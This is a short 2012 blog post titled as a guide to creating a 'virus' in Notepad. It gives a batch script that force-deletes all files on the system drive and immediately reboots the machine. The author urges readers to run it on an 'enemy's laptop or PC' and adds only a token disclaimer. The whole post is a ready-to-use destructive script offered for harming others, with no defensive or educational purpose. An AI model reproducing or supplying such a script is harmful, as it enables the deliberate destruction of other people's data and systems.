Pages

Monday, February 20, 2012

Create Virus Which Crashes Windows within Few Seconds Using Notepad


This is a very simple virus program to delete all the contents of the C drive and completely deletes the windows operating system.

Open Notepad and Enter the following code
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save the above code with  .bat extension.

Caution: If you open the .bat file it will delete ur systemdrive. so be careful If Any lose of ur data i am not responsible for that. You should carefully use it. Use it only on your enemy's laptop or PC. 

reffred frm hackers333

0 comments:

Post a Comment

Note: Only a member of this blog may post a comment.